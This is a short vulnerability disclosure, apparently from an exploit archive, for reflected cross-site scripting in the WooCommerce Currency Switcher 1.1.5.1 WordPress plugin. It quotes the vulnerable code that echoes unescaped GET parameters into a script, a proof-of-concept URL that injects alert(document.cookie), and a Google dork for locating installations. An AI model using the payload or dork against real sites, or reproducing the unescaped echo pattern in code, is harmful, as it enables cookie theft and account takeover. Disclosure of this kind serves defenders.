WordPress WooCommerce Currency Switcher 1.1.5.1 Cross Site Scripting
Posted on 10 February 2016
# Exploit Title: Woocomerce Currency Switcher XSS # Google Dork: index of /wp-content/plugins/woocomerce-currency-switcher/ # Date: 06 Feb 2016 # Exploit Author: Ben Khlifa Fahmi (from Tuisian Whitehats Security) # Software Link: https://downloads.wordpress.org/plugin/woocommerce-currency-switcher.zip # Version: 1.1.5.1 Vulnerable Code : Page : /wp-content/plugins/woocomerce-currency-switcher/index.php Vulnerable Function : wp_head() Line 765: <?php if (!empty($_GET)): ?> [-] woocs_array_of_get = '<?php echo json_encode($_GET); ?>'; <?php endif; ?> -------------------------------------- Exploit Link : http://localhost/?s=xss';alert(document.cookie);<!--&post_type=product -------------------------------------- Special Thanks to all Whitehats Security : Amine Zemzemi , Youssef Werhani , Bilel El Jamii , Bayrem Ghanmi, Charfeddin Hamdi , Med Achref and all our members :D.
